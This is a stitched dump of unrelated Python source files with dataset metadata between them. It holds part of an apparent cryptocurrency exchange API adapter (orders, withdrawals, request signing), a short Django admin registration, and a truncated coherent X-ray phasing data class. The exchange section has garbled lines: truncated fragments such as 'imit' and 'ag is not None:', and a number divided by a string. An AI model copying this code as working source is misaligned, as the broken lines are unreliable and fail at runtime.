side = self.safe_string(trade, 's')
return {
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'id': id,
'order': None,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
'info': trade,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.marketGetOrder(self.extend(request, params))
return self.parse_trades(response['data'], market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
return [
self.safe_integer(ohlcv, 'time'),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'volume'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
duration = self.parse_timeframe(timeframe) * 1000
market = self.market(symbol)
request = {
'symbol': market['id'],
'resolution': self.timeframes[timeframe],
}
if limit is not None:
request['size'] = min(limit, 300)
if since is not None:
request['to'] = self.sum(since, limit * duration * 1000)
else:
if since is not None:
raise ArgumentsRequired(self.id + ' fetchOHLCV requires a limit argument if the since argument is specified')
response = self.marketGetKline(self.extend(request, params))
data = self.safe_value(response, 'data', {})
bars = self.safe_value(data, 'bars', [])
return self.parse_ohlcvs(bars, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'0': 'open',
'1': 'open',
'2': 'closed',
'3': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
id = self.safe_string(order, 'id')
symbol = None
if market is None:
baseId = self.safe_string(order, 'coinFrom')
quoteId = self.safe_string(order, 'coinTo')
if (baseId is not None) and (quoteId is not None):
marketId = baseId + '_' + quoteId
if marketId in self.markets_by_id:
market = self.safe_value(self.markets_by_id, marketId)
else:
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
if market is not None:
symbol = market['symbol']
side = self.safe_string(order, 'flag')
if side is not None:
side = 'sell' if (side == 'sale') else 'buy'
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'number')
remaining = self.safe_float(order, 'numberOver')
filled = self.safe_float(order, 'numberDeal')
timestamp = self.safe_integer(order, 'timestamp')
if timestamp is None:
timestamp = self.safe_timestamp(order, 'created')
cost = self.safe_float(order, 'orderTotalPrice')
if price is not None:
if filled is not None:
cost = filled * price
status = self.parse_order_status(self.safe_string(order, 'status'))
return {
'id': id,
'clientOrderId': None,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': 'limit',
'side': side,
'price': price,
'cost': cost,
'amount': amount,
'filled': filled,
'remaining': remaining,
'trades': None,
'fee': None,
'info': order,
'average': None,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
if type != 'limit':
raise ExchangeError(self.id + ' createOrder allows limit orders only')
market = self.market(symbol)
orderType = '1' if (side == 'buy') else '2'
if not self.password:
raise ExchangeError(self.id + ' createOrder() requires you to set exchange.password = "YOUR_TRADING_PASSWORD"(a trade password is NOT THE SAME as your login password)')
request = {
'symbol': market['id'],
'type': orderType,
'price': self.price_to_precision(symbol, price),
'number': self.amount_to_precision(symbol, amount),
'tradePwd': self.password,
}
response = self.tradePostAddEntrustSheet(self.extend(request, params))
timestamp = self.parse_microtime(self.safe_string(response, 'microtime'))
order = self.extend({
'timestamp': timestamp,
}, response['data'])
return self.parse_order(order, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
return response
def cancel_orders(self, ids, symbol=None, params={}):
self.load_markets()
request = {
'ids': ','.join(ids),
}
response = self.tradePostCancelEntrustSheet(self.extend(request, params))
return response
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'entrustSheetId': id,
}
response = self.tradePostGetEntrustSheetInfo(self.extend(request, params))
return self.parse_order(response['data'])
def fetch_orders_with_method(self, method, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOpenOrders requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'coinFrom': market['baseId'],
'coinTo': market['quoteId'],
imit
if since is not None:
request['startTime'] = int(since / 1000)
response = getattr(self, method)(self.extend(request, params))
orders = self.safe_value(response['data'], 'data', [])
return self.parse_orders(orders, None, since, limit)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserNowEntrustSheet', symbol, since, limit, params)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return self.fetch_orders_with_method('tradePostGetUserHistoryEntrustSheet', symbol, since, limit, params)
def parse_transaction_status(self, status):
statuses = {
'1': 'pending',
'2': 'pending',
'3': 'pending',
'4': 'ok',
'5': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
timestamp = self.safe_integer(transaction, 'updated')
if timestamp == 0:
timestamp = None
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'type')
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
fee = None
feeCost = self.safe_float(transaction, 'network_fee')
if feeCost is not None:
fee = {
'cost': feeCost,
'code': code,
}
return {
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'txid'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': self.safe_string(transaction, 'wallet'),
'tag': self.safe_string(transaction, 'memo'),
'type': type,
'amount': self.safe_float(transaction, 'number'),
'currency': code,
'status': status,
'updated': timestamp,
'fee': fee,
'info': transaction,
}
def parse_transactions_by_type(self, type, transactions, code=None, since=None, limit=None):
result = []
for i in range(0, len(transactions)):
transaction = self.parse_transaction(self.extend({
'type': type,
}, transactions[i]))
result.append(transaction)
return self.filter_by_currency_since_limit(result, code, since, limit)
def parse_transaction_type(self, type):
types = {
'deposit': 1,
'withdrawal': 2,
}
return self.safe_integer(types, type, type)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('deposit', code, since, limit, params)
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
return self.fetch_transactions_for_type('withdrawal', code, since, limit, params)
def fetch_transactions_for_type(self, type, code=None, since=None, limit=None, params={}):
if code is None:
raise ArgumentsRequired(self.id + ' fetchTransactions() requires a currency `code` argument')
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'type': self.parse_transaction_type(type),
}
if since is not None:
request['startTime'] = int(since / str(1000))
if limit is not None:
request['page'] = 1
request['pageSize'] = limit
response = self.tradePostDepositOrWithdraw(self.extend(request, params))
transactions = self.safe_value(response['data'], 'data', [])
return self.parse_transactions_by_type(type, transactions, code, since, limit)
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
request = {
'coin': currency['id'],
'number': self.currency_to_precision(code, amount),
'address': address,
ag is not None:
request['memo'] = tag
response = self.tradePostCoinOut(self.extend(request, params))
data = self.safe_value(response, 'data', {})
return self.parse_transaction(data, currency)
def nonce(self):
currentTimestamp = self.seconds()
if currentTimestamp > self.options['lastNonceTimestamp']:
self.options['lastNonceTimestamp'] = currentTimestamp
self.options['lastNonce'] = 100000
self.options['lastNonce'] = self.sum(self.options['lastNonce'], 1)
return self.options['lastNonce']
def sign(self, path, api='market', method='GET', params={}, headers=None, body=None):
baseUrl = self.implode_params(self.urls['api'][api], {'hostname': self.hostname})
url = baseUrl + '/' + self.capitalize(api) + '/' + path
query = None
if api == 'market':
query = self.urlencode(params)
if len(query):
url += '?' + query
else:
self.check_required_credentials()
body = self.rawencode(self.keysort(self.extend({
'apiKey': self.apiKey,
'timeStamp': self.seconds(),
'nonce': self.nonce(),
}, params)))
body += '&sign=' + self.hash(self.encode(body + self.secret))
headers = {'Content-type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
status = self.safe_string(response, 'status')
if status is not None:
feedback = self.id + ' ' + body
if status == '200':
code = self.safe_integer(response, 'data')
if code is not None:
self.throw_exactly_matched_exception(self.exceptions, code, feedback)
raise ExchangeError(feedback)
else:
return
self.throw_exactly_matched_exception(self.exceptions, status, feedback)
raise ExchangeError(feedback)
| true | true |
f72321b2ef93ed9a3701ed57a938c91891a936c2 | 117 | py | Python | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | null | null | null | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | 4 | 2021-03-19T01:37:07.000Z | 2021-06-10T18:55:35.000Z | events/admin.py | iosoftworks/locale-backend-v2 | bc162ca2ccdf1454c9d25c51a477abe3f4dce665 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Event
# Register your models here.
admin.site.register(Event) | 16.714286 | 32 | 0.794872 | from django.contrib import admin
from .models import Event
admin.site.register(Event) | true | true |
f7232356adc5d775fcd3a8d9bee655b6f40c630d | 40,789 | py | Python | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | 3 | 2018-05-11T16:05:55.000Z | 2021-12-20T08:52:02.000Z | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | null | null | null | cxphasing/CXData.py | jbgastineau/cxphasing | a9847a0afb9a981d81f027e75c06c9bb2b531d33 | [
"MIT"
] | 2 | 2018-11-14T08:57:10.000Z | 2021-12-20T08:52:06.000Z | """
.. module:: CXData
:platform: Unix
:synopsis: A class for coherent X-ray phasing data.
.. moduleauthor:: David Vine <djvine@gmail.com>
"""
import scipy as sp
import numpy as np
import scipy.fftpack as spf
import scipy.ndimage as spn
from numpy.random import uniform
from numpy import pad
import os
import pdb
import pylab
import shutil
import sys
import operator
from round_scan import round_roi
import glob
import multiprocessing as mp
import time
from matplotlib import cm
from images2gif import writeGif
from CXFileReader import CXFileReader
from cxparams import CXParams as CXP
debug = True
def fft2(x):
    """Forward 2D FFT, dispatching on CXData, CXModal or a bare ndarray."""
    if isinstance(x, CXData):
        return CXData(data=[spf.fft2(arr) for arr in x.data])
    if isinstance(x, CXModal):
        # Recurse: transform each mode's CXData independently.
        return CXModal(modes=[fft2(mode) for mode in x.modes])
    if isinstance(x, np.ndarray):
        return spf.fft2(x)
    raise Exception('Unknown data type passed to fft2')
def ifft2(x):
    """Inverse 2D FFT, dispatching on CXData, CXModal or a bare ndarray."""
    if isinstance(x, CXData):
        return CXData(data=[spf.ifft2(arr) for arr in x.data])
    if isinstance(x, CXModal):
        # Recurse: transform each mode's CXData independently.
        return CXModal(modes=[ifft2(mode) for mode in x.modes])
    if isinstance(x, np.ndarray):
        return spf.ifft2(x)
    raise Exception('Unknown data type passed to ifft2')
def fftshift(x):
    """FFT-shift each array of a CXData, or a bare ndarray. CXModal is not supported."""
    if isinstance(x, CXData):
        return CXData(data=[spf.fftshift(arr) for arr in x.data])
    if isinstance(x, np.ndarray):
        return spf.fftshift(x)
    raise Exception('Unknown data type passed to fftshift')
def abs(x):
    """Elementwise absolute value (shadows the builtin), dispatching on type."""
    if isinstance(x, CXData):
        return CXData(data=[np.abs(arr) for arr in x.data])
    if isinstance(x, CXModal):
        return CXModal(modes=[abs(mode) for mode in x.modes])
    if isinstance(x, np.ndarray):
        return np.abs(x)
    raise Exception('Unknown data type passed to abs')
def angle(x):
    """Elementwise complex phase of a CXData or ndarray. CXModal is not supported."""
    if isinstance(x, CXData):
        return CXData(data=[sp.angle(arr) for arr in x.data])
    if isinstance(x, np.ndarray):
        return sp.angle(x)
    raise Exception('Unknown data type passed to angle')
def exp(x):
    """Elementwise exponential of a CXData or ndarray. CXModal is not supported."""
    if isinstance(x, CXData):
        return CXData(data=[sp.exp(arr) for arr in x.data])
    if isinstance(x, np.ndarray):
        return sp.exp(x)
    raise Exception('Unknown data type passed to exp')
def log(x):
    """Elementwise natural logarithm of a CXData or ndarray. CXModal is not supported."""
    if isinstance(x, CXData):
        return CXData(data=[sp.log(arr) for arr in x.data])
    if isinstance(x, np.ndarray):
        return sp.log(x)
    raise Exception('Unknown data type passed to log')
def conj(x):
    """
    Elementwise complex conjugate, dispatching on CXData, CXModal or ndarray.
    """
    if isinstance(x, CXData):
        return CXData(data=[sp.conj(arr) for arr in x.data])
    if isinstance(x, CXModal):
        return CXModal(modes=[conj(mode) for mode in x.modes])
    if isinstance(x, np.ndarray):
        return sp.conj(x)
    raise Exception('Unknown data type passed to conj')
def sqrt(x):
    """
    Elementwise square root of a CXData, CXModal, scalar or ndarray.
    """
    if isinstance(x, CXData):
        return CXData(data=[sp.sqrt(x.data[i]) for i in range(len(x))])
    elif isinstance(x, CXModal):
        # Bug fix: the original called exp() on each mode (copy-paste from the
        # exp wrapper), which does not compute a square root.
        return CXModal(modes=[sqrt(x.modes[mode]) for mode in range(len(x.modes))])
    elif isinstance(x, (int, float, complex, np.ndarray)):
        return sp.sqrt(x)
    else:
        raise Exception('Unknown data type passed to sqrt')
def sum(x):
    """
    Sum over arrays.

    For CXData: a single-array CXData holding the elementwise sum over all
    member arrays. For CXModal: each mode is summed independently. For a
    bare ndarray: scipy's scalar sum.
    """
    if isinstance(x, CXData):
        # Accumulate into a copy so the caller's first array is not mutated
        # in place (the original aliased x.data[0] and += on it).
        total = x.data[0].copy()
        for i in range(1, len(x)):
            total += x.data[i]
        return CXData(data=[total])
    elif isinstance(x, CXModal):
        # Bug fix: the original referenced an undefined name 'self' here,
        # raising NameError for any CXModal input.
        return CXModal(modes=[sum(x.modes[mode]) for mode in range(len(x.modes))])
    elif isinstance(x, np.ndarray):
        return sp.sum(x)
    else:
        raise Exception('Unknown data type pass to sum')
def worker(func):
    # Decorator that turns a stack-processing method into a multiprocessing
    # queue consumer.  Two call modes:
    #   * kwargs contains 'no_decorate': run func once, directly, on the six
    #     positional arguments and return its result.
    #   * otherwise args is (jobs, results): pull job tuples from the
    #     JoinableQueue until the (None, ...) poison pill arrives, pushing
    #     each result onto the results queue.
    def worker2(self=None, *args, **kwargs):
        try:
            kwargs['no_decorate']
            return func(self, args[0], args[1], args[2], args[3], args[4], args[5])
        except KeyError:
            cnt = 0
            jobs, results = args[0], args[1]
            while True:
                job_args = jobs.get()
                if job_args[0]==None:  # Deal with Poison Pill
                    print '{}: Exiting. {:d} jobs completed.'.format(mp.current_process().name, cnt)
                    jobs.task_done()
                    break
                # Progress report roughly every 10% of the job count.
                if job_args[0]%np.floor(job_args[1]/10)==0:
                    print 'Processed {:d} out of {:d} files.'.format(job_args[0], job_args[1])
                res = func(self, *job_args)
                cnt+=1
                jobs.task_done()
                results.put(res)
        # NOTE(review): this inner 'return worker2' hands back the wrapper
        # object itself after the queue drains; callers appear to ignore the
        # return value, but it looks unintentional -- confirm.
        return worker2
    return worker2
class CXData(CXFileReader):
"""
Defines a class for holding and interacting with coherent x-ray data.
...
Attributes
----------
data: list
list of complex arrays that hold all of the phase retrieval data.
name: str
name of instance. Used for logging.
savepath: str
location where this data should be saved.
Methods
-------
"""
def __init__(self, *args, **kwargs):
self.data = None
self.savepath = None
for kw in kwargs:
# Data attribute must be a list of arrays
if kw=='data':
if isinstance(kwargs['data'], list):
self.data = kwargs['data']
elif isinstance(kwargs['data'], np.ndarray):
self.data = [kwargs['data']]
else:
setattr(self, kw, kwargs[kw])
def __repr__(self):
try:
s=repr(self.data[0])
except:
s=''
try:
return '<{} at {}>\n{} arrays ({:d}x{:d}px).\n{}'.format(self.__class__,
hex(id(self)), len(self.data), self.data[0].shape[0], self.data[0].shape[1], s)
except AttributeError:
return '<{} at {}>\nNo data attribute present.'.format(self.__class__, hex(id(self)))
def __add__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]+other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__add__(other, self)
def __iadd__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]+=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]+=other
return self
elif isinstance(other, CXModal):
raise("The meaning of += is ambiguous for these datatypes")
def __sub__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]-other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__sub__(other, self)*-1.0
def __isub__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]-=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]-=other.data
return self
elif isinstance(other, CXModal):
raise("The meaning of -= is ambiguous for these datatypes")
def __pow__(self, power):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]**power)
return CXData(data=l)
def __mul__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]*other)
return CXData(data=l)
elif isinstance(other, CXModal):
return CXModal.__mul__(other, self)
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]*=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]*=other
return self
elif isinstance(other, CXModal):
raise("The meaning of *= is ambiguous for these datatypes")
def __div__(self, other):
if isinstance(other, CXData):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other.data[i])
return CXData(data=l)
elif isinstance(other, (int, float, complex)):
l=[]
for i in xrange(len(self.data)):
l.append(self.data[i]/other)
return CXData(data=l)
elif isinstance(other, CXModal):
raise("The meaning of / is ambiguous for these datatypes")
def __rdiv__(self, other):
return self.__mul__(other)
def __idiv__(self, other):
if isinstance(other, CXData):
for i in xrange(len(self.data)):
self.data[i]/=other.data[i]
return self
elif isinstance(other, (int, float, complex)):
for i in xrange(len(self.data)):
self.data[i]/=other
return self
elif isinstance(other, CXModal):
raise("The meaning of /= is ambiguous for these datatypes")
def __len__(self):
return len(self.data)
    def __del__(self):
        # Deregister this instance from the class-level registry on deletion.
        # NOTE(review): neither 'CXData.__all__' nor 'self.kwargs' is created
        # by the __init__ shown in this file; both lookups are guarded below,
        # so a plain CXData passes through silently -- confirm against the
        # rest of the project.
        try:
            print 'Deleting {}'.format(self.kwargs['itype'])
            CXData.__all__.pop(self.kwargs['itype'])
        except (AttributeError, KeyError):
            pass
    def __getitem__(self, s):
        """
        Allows extracting a subarray from self.data or a single array from a list of arrays.

        Implements subpixel shifting for seamless indexing of a fractional number of pixels.
        The returned array must be an integer number of pixels.

        E.g a[0:100.6] doesn't make any sense
        but a[0.6:100.6] does.

        a[0] is equivalent to a.data[0]

        NOTE(review): the slice tuple is unpacked as (y, x) but the y-slice is
        then applied to axis 1 and the x-slice to axis 0 -- confirm the
        intended axis convention against callers.
        """
        if isinstance(s, int):
            return CXData(data=self.data[s])
        else:
            y, x = s
            # Missing slice bounds default to (almost) the full array extent.
            xstart = x.start or 0
            xstop = x.stop or self.data[0].shape[0]-1
            ystart = y.start or 0
            ystop = y.stop or self.data[0].shape[1]-1
            # Fractional part of the start becomes a subpixel shift applied
            # after taking the integer-pixel crop.
            dx, dy = -np.mod(xstart, 1), -np.mod(ystart, 1)
            l = []
            for data in self.data:
                l.append(self.shift(data[xstart // 1:xstop // 1, ystart //1: ystop //1], dx, dy))
            return CXData(data=l)
    def __setitem__(self, s, arr):
        """
        Embed a smaller array in a larger array.

        a[s] = arr

        Accepts a CXData (elementwise per stack entry), a single ndarray
        (broadcast to every stack entry), or a scalar fill value.  Fractional
        slice starts are honoured by subpixel-shifting the inserted data.
        """
        if isinstance(s, int):
            if len(arr)>1:
                raise Exception('Cannot set single array with list of arrays.')
            self.data[s]=arr.data[0]
        else:
            y, x = s
            xstart = x.start or 0
            xstop = x.stop or self.data[0].shape[0]-1
            ystart = y.start or 0
            ystop = y.stop or self.data[0].shape[1]-1
            # Fractional part of the start becomes a subpixel shift.
            dx, dy = np.mod(xstart, 1), np.mod(ystart, 1)
            l=[]
            if isinstance(arr, CXData):
                for i, data in enumerate(self.data):
                    l.append(data.copy())
                    l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = self.shift(arr.data[i], dx, dy)
                self.data = l
            elif isinstance(arr, np.ndarray):
                for i, data in enumerate(self.data):
                    l.append(data.copy())
                    l[i][xstart // 1:xstop // 1, ystart //1:ystop //1] = self.shift(arr, dx, dy)
                self.data = l
            elif isinstance(arr, (int, float)):
                # Scalar fill: write the value, then shift the whole frame.
                # NOTE(review): shifting the full frame (not just the filled
                # region) differs from the other branches -- confirm intended.
                for i, data in enumerate(self.data):
                    l.append(data.copy())
                    l[i][xstart // 1:xstop // 1, ystart //1: ystop //1] = arr
                    l[i] = self.shift(l[i], dx, dy)
                self.data = l
@staticmethod
def inner_product(u, v):
return sp.sum((conj(u)*v).data[0])/(u.data[0].shape[0]*u.data[0].shape[1])
@staticmethod
def proj_u_v(u, v):
return u*(CXData.inner_product(v, u)/CXData.inner_product(u, u))
def max(self):
"""
Return a list of maximum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).max()
else:
return [abs(element).max() for element in self.data]
def min(self):
"""
Return a list of minimum (absolute) value(s) of (complex) array(s).
"""
if len(self.data)==1:
return abs(self.data[0]).min()
else:
return [abs(element).min() for element in self.data]
def normalise(self, val=1.):
"""
Rebase data from 0 to 1.
"""
if CXP.reconstruction.verbose:
CXP.log.info('Rebasing data from 0 to {:3.2f}'.format(val))
for i in xrange(len(self.data)):
self.data[i] -= abs(self.data[i]).min()
self.data[i] /= abs(self.data[i]).max()
self.data[i] *= val
def append(self, other):
if isinstance(other, CXData):
for data in other.data:
self.data.append(data)
elif isinstance(other, np.ndarray):
self.data.append(other)
def square_root(self):
if CXP.reconstruction.verbose:
CXP.log.info('Taking square root.')
for i in xrange(len(self.data)):
self.data[i] = pow(self.data[i], 0.5)
def fft_shift(self):
if CXP.reconstruction.verbose:
CXP.log.info('Performing FFT shift.')
for i in xrange(len(self.data)):
self.data[i] = spf.fftshift(self.data[i])
def len(self):
return len(self.data)
@staticmethod
def shift_inner(arr, nx, ny, window=False, padding='reflect'):
"""
Shifts an array by nx and ny respectively.
"""
if ((nx % 1. == 0.) and (ny % 1. ==0)):
return sp.roll(sp.roll(arr, int(ny), axis=0),
int(nx), axis=1)
else:
atype = arr.dtype
if padding:
x, y = arr.shape
pwx, pwy = int(pow(2., np.ceil(np.log2(1.5*arr.shape[0])))), int(pow(2., np.ceil(np.log2(1.5*arr.shape[1]))))
pwx2, pwy2 = (pwx-x)/2, (pwy-y)/2
if pad=='zero':
arr = pad.with_constant(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
else:
arr = pad.with_reflect(arr, pad_width=((pwx2, pwx2), (pwy2, pwy2)))
phaseFactor = sp.exp(complex(0., -2.*sp.pi)*(ny*spf.fftfreq(arr.shape[0])[:, np.newaxis]+nx*spf.fftfreq(arr.shape[1])[np.newaxis, :]))
if window:
window = spf.fftshift(CXData._tukeywin(arr.shape[0], alpha=0.35))
arr = spf.ifft2(spf.fft2(arr)*phaseFactor*window)
else:
arr = spf.ifft2(spf.fft2(arr)*phaseFactor)
if padding:
arr = arr[pwx/4:3*pwx/4, pwy/4:3*pwy/4]
if atype == 'complex':
return arr
else:
return np.real(arr)
@staticmethod
def shift(x, nx, ny, **kwargs):
if isinstance(x, CXData):
l=[]
for data in x.data:
l.append(CXData.shift_inner(data.copy(), nx, ny, **kwargs))
return CXData(data=l)
elif isinstance(x, np.ndarray):
return CXData.shift_inner(x, nx, ny)
def ishift(self, nx, ny, **kwargs):
# Inplace version of shift
l=[]
for data in self.data:
for data in self.data:
l.append(self.shift_inner(data.copy(), nx, ny, kwargs))
self.data = l
return self
def rot90(self, i):
# Rotate by 90 degrees i times
if CXP.reconstruction.verbose:
CXP.log.info('Rotating data by {:d}'.format(i*90))
for j, data in enumerate(self.data):
self.data[j] = sp.rot90(data, i)
def find_dead_pixels(self):
# Return coordinates of pixels with a standard deviation of zero
dead_pix = sp.where(abs(np.std(self.data, axis=0))<machine_precision)
if CXP.reconstruction.verbose:
CXP.log.info('Found {0:d} dead pixels'.format(len(dead_pix)))
return dead_pix
def zero_dead_pixels(self):
if CXP.reconstruction.verbose:
CXP.log.info('Setting dead pixels to zero')
self.data[self.find_dead_pixels()]=0.
def threshhold(self, threshhold=None):
if not threshhold:
threshhold = CXP.preprocessing.threshhold_raw_data
if CXP.reconstruction.verbose:
CXP.log.info('Applying threshhold to data at {:3.2f} and rebasing to 0.'.format(threshhold))
for i, data in enumerate(self.data):
tdata = sp.where(data<threshhold, threshhold, data)
tdata-=tdata.min()
self.data[i]=tdata
    def symmetrize_array_shape(self, qxqy0=None, desired_shape=None):
        """
        Crop and/or zero-pad every array to a square of side `desired_shape`
        centred on the beam centre (qx, qy).  Defaults come from CXP.

        Index convention below: n* index into the new (destination) array,
        m* into the original (source) array.
        """
        x0, y0 = self.data[0].shape
        if desired_shape is None:
            desired_shape = CXP.preprocessing.desired_array_shape
        if qxqy0 is None:
            qx, qy = CXP.preprocessing.qx0qy0
        else:
            qx, qy = qxqy0
        if CXP.reconstruction.verbose:
            CXP.log.info('Symmetrizing array shape.\n\tCurrent shape:\t{}x{}\n\tNew shape:\t{}x{}\n\tCentred on:\t{},{}'.format(
                        x0, y0, desired_shape, desired_shape, qx, qy))
        # Cropping or padding?
        qx_lower, qx_upper = qx-desired_shape/2, qx+desired_shape/2
        qy_lower, qy_upper = qy-desired_shape/2, qy+desired_shape/2
        # NOTE(review): the original inline labels on these branches had
        # Crop/Pad swapped; a negative lower bound means the window extends
        # past the array edge and must be padded, not cropped.
        if qx_lower<0:  # Pad: window starts before the array edge
            nxl, mxl = np.abs(qx_lower), 0
        else:  # Crop
            nxl, mxl = 0, qx_lower
        if qy_lower<0:  # Pad
            nyl, myl = np.abs(qy_lower), 0
        else:  # Crop
            nyl, myl = 0, qy_lower
        if qx_upper<x0:  # Crop: window ends inside the array
            nxu, mxu = desired_shape, qx+desired_shape/2
        else:  # Pad
            # NOTE(review): 'x0-qx_lower' as the destination end assumes the
            # lower side determined the offset -- confirm for off-centre qx.
            nxu, mxu = x0-qx_lower, x0
        if qy_upper<y0:  # Crop
            nyu, myu = desired_shape, qy+desired_shape/2
        else:  # Pad
            nyu, myu = y0-qy_lower, y0
        for i in range(len(self.data)):
            tmp = sp.zeros((desired_shape, desired_shape))
            tmp[nxl:nxu, nyl:nyu] = self.data[i][mxl:mxu, myl:myu]
            self.data[i] = tmp
        # Record the new array side length globally.
        CXP.p = CXP.preprocessing.desired_array_shape
def treat_beamstop(self):
factor = CXP.measurement.beam_stop_factor.keys()[0]
x0, y0 = CXP.measurement.beam_stop_factor[factor][0]
x1, y1 = CXP.measurement.beam_stop_factor[factor][1]
for i in range(len(self.data)):
self.data[i][x0:x1, y0:y1]*=factor
def save(self, path=None):
if path:
filepath = path
else:
filepath = self.savepath
try:
CXP.log.info('Saving {} to:\n\t{}'.format(self.name, filepath))
except AttributeError:
CXP.log.info('Saving to:\n\t{}'.format(filepath))
try:
np.savez(filepath, *self.data)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not save {} to {}'.format(self.kwargs['name'], path))
def load(self, path=None):
if path:
filepath = path
else:
filepath = self.filename
CXP.log.info('Loading data from:\n\t{}'.format(filepath))
try:
self.data = self.openup(filepath)
except IOError as e:
CXP.log.error(e)
raise Exception('Could not load file from {}'.format(filepath))
if not isinstance(self.data, list):
self.data = [self.data]
    def init_data(self, *args, **kwargs):
        """
        Initialise a named data type: 'det_mod' (sample diffraction),
        'probe_det_mod' (whitefield) or 'dark' (darkfield).  Each either
        preprocesses raw frames or loads a previously saved file, depending
        on CXP.actions.preprocess_data.
        """
        if args[0] == 'det_mod':
            if CXP.actions.preprocess_data:
                self.read_in_data()
            else:
                self.load()

        elif args[0] == 'probe_det_mod':
            if CXP.actions.preprocess_data:
                # Get list of white files
                CXP.log.info('Preprocessing probe detector modulus.')
                if CXP.io.whitefield_filename not in [None, '']: # If whitefields were measured
                    wfilename, wfilerange, wn_acqs = [CXP.io.whitefield_filename, CXP.io.whitefield_filename_range,
                                                      CXP.measurement.n_acqs_whitefield]
                    # Filename pattern = number of '{' format fields (see read_in_data).
                    self.pattern = wfilename.count('{')
                    if self.pattern == 1:
                        wf = [wfilename.format(i) for i in range(wfilerange[0], wfilerange[1])]
                    elif self.pattern == 2:
                        wf = [wfilename.format(wfilerange[0], i) for i in range(wn_acqs)]
                    elif self.pattern == 3:
                        wf = glob.glob(wfilename.split('}')[0]+'}*')
                    # no_decorate bypasses the queue machinery of @worker.
                    res = self.preprocess_data_stack(0, 1, wf, self.pattern, None, None, no_decorate=True)
                    self.data = res[1]
                else: #Guesstimate the whitefield from the average of the diffraction patterns
                    pass
            else:
